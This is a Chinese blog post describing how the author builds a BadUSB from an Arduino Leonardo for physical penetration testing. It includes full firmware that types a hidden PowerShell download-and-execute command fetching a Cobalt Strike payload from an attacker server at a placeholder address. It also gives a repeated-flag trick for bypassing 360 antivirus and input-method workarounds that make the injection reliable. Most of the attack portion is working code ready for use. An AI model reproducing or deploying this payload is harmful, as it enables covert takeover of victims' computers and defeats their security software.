前言
之前看过不少badusb制作的文章,一直没有亲自动手尝试过,记录下自己动手制作badusb的过程,方便以后遇到攻击场景可以直接利用。
实验准备
首先需要一个badusb,本次使用的是leonardo_Arduino
Arduino工具,用于烧录badusb
公网cs服务器,执行powershell脚本,接收反弹的会话
win10物理机,模拟被攻击主机
制作过程
Arduino使用
制作过程非常简单,首先下载Arduino开发者工具—用来向leonardo烧录程序的软件。
下载地址https://www.arduino.cn/thread-5838-1-1.html
安装成功后,打开工具,选择开发版和编程器为:"Arduino leonardo"和"USBasp",插入badusb,选择对应的端口连接。
实现目的:自动输入远程下载执行cs上线的ps代码,从而控制目标机器。
首先对badusb制作的按键代码进行学习,badusb可以模拟键盘输入和鼠标点击。
具体按键设置:
delay(5000);//延时毫秒
Keyboard.begin(); //开始键盘通讯
Keyboard.end(); //结束键盘通讯
Keyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来
Keyboard.release(); //释放键盘按键
Keyboard.println(""); //输入字符串使用双引号括起来
Mouse.begin();//鼠标事件开始
Mouse.click();//鼠标单击
Mouse.end();//鼠标事件结束
Mouse.move();//鼠标移动(x,y)
Mouse.press();//鼠标按下
Mouse.release();//鼠标松开
Mouse.isPressed();//
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI //win键
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN//回车键
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12
编写利用代码
以下为我编写的利用代码。
#include<Keyboard.h> //包含键盘模块头文件
void setup(){ //初始化
Keyboard.begin();//开始键盘通信
delay(3000);//延时3000毫秒,
Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键
Keyboard.press('r');//按下r键 CMD
delay(500);
Keyboard.release(KEY_LEFT_GUI);//松掉win键
Keyboard.release('r');//松掉r键
delay(500);
Keyboard.println("cmd ");
Keyboard.press(KEY_RETURN); //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500);
Keyboard.press(KEY_CAPS_LOCK); //大小写切换
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("powershell.exe -W Normal -W Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w hidden IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x/a') ");
delay(500);
Keyboard.press(KEY_RETURN); //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500);
Keyboard.press(KEY_CAPS_LOCK); //大小写切换
Keyboard.release(KEY_CAPS_LOCK); //释放大写
delay(500);
Keyboard.end();//结束键盘通讯
}
void loop()
{
}
在代码实现的过程中主要发现2个坑点。
1、目标机器默认中文输入法的问题
2、在某些系统运行需要安装驱动
目标机器默认中文输入法
在实际利用情况下,如果目标默认使用的是中文输入法,当插入badusb模拟键盘输入时,会影响正常输入。
比如输入-w hidden,实际输出为-我hidden
尝试了2种解决方法:
1、模拟KEY_LEFT_SHIFT按键把中文输出法切换为英文
2、模拟KEY_CAPS_LOCK按键输出大写字符
第一种解决方法,模拟KEY_LEFT_SHIFT按键,在目标为中文输入法时,可以正常切换为英文,正常输出,但一旦对方默认为英文输入法,反而画蛇添足。
第二种解决方法,模拟KEY_CAPS_LOCK按键,在默认使用中英文输入法时都适用,唯一不适应的情况是对方默认使用中文输入法且开启了大写输入。
免杀处理
普通的powershell命令会被360检测到。
之前公布出的powershell免杀方法基本都失效了,本次在之前的方法上进行升级,可完美绕过360全家桶。
powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w hidden IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x/a')
键盘操作流程是,首先按下win+r键,由于免杀后的powershell代码超过运行的长度限制,因此需要先调用cmd,然后在cmd命令行中运行powershell命令。
把代码编译烧录到badusb。
成功bypass360,这里有一个坑点需要注意!!!
由于为了解决中文输入法的问题,badusb模拟了KEY_CAPS_LOCK按键转化为大写,因此写入的powershell远程下载地址需要与实际的相反。如下:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/shell'))
变为
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/SHELL'))
cs上线成功。
总结
本次对物理渗透中的badusb制作进行了学习,成功绕过360运行badusb 执行powershell代码,badusb以及免杀powershell能做的事情还有很多~
参考链接
https://www.cnblogs.com/enderzhou/p/7058570.html
https://cloud.tencent.com/developer/article/1472490
网友评论